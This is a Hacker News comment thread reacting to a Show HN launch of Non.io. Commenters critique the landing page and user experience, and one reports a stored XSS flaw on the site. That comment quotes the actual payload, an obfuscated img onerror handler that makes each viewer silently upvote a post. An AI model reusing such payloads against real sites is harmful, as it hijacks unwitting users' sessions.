zlacker

[return to "Show HN: Non.io, a Reddit-like platform Ive been working on for the last 4 years"]
1. root_a+Ih[view] [source] 2023-06-12 17:46:31
>>jjcm+(OP)
Congrats on the hard work, and the idea is fine, but the problem is that tech like this is a cheap commodity in a massively oversaturated space, and without a hook that makes the platform exceptional (innovative/clever/beautiful design, unique aggregation features, inherently interesting content, reimagined user/content/moderation dynamics etc etc), this kind of thing is dead in the water because it lacks a network effect. Add in the upfront subscription model and failure to launch is basically assured.

When I visit the root domain I shouldn't be greeted with a marketing splash page, you need interesting content in the user's face right away, entice their curiosity and drive the user to explore the site... even as a fellow developer, my first instinct is to abandon the page as soon as I'm greeted with the cliche startup marketing page. Consider the user experience when I visit reddit.com or news.ycombinator.com or any other link aggregation competitor. What you have now is a tech demo, not a platform. Sorry if that's a little harsh, but I mean well! Good luck!

◧◩
2. SkyMar+aj[view] [source] 2023-06-12 17:51:02
>>root_a+Ih
Mostly agree. The screenshot in the top right looks good, like professional app I might actually use. But I want to actually browse the site and check it out without first slogging through a registration process. If it’s free to view/browse anyway, then enable doing that without registering. Register and pay if you want to post.

Edit: You can browse without registering after all, here’s the link: https://non.io/#all (didn’t see it on the landing page or OP post).

◧◩◪
3. neogod+Vo[view] [source] 2023-06-12 18:10:23
>>SkyMar+aj
Oof, I clicked one of those posts and immediately lost all back-button functionality to an endless stream of history events.
◧◩◪◨
4. oefrha+Vu3[view] [source] 2023-06-13 13:44:11
>>neogod+Vo
Also, when I visit the #all page I get two weird window.alert()’s, first says 5, second says 1. I’m on mobile Safari now so can’t really investigate, but is the site getting script injected??
◧◩◪◨⬒
5. Antony+Uw3[view] [source] 2023-06-13 13:54:21
>>oefrha+Vu3
Yes, the site is vulnerable to XSS, couple of interesting payloads on there so far

The current top post uses this XSS to have users upvote it:

<img src="a" onerror="soci.postData(String.fromCharCode(112,111,115,116,116,97,103,47,97,100,100,45,118,111,116,101),{post:String.fromCharCode(120),tag:String.fromCharCode(120)})">

Which sends a POST request to `posttag/add-vote` for the post labeled `x`

[go to top]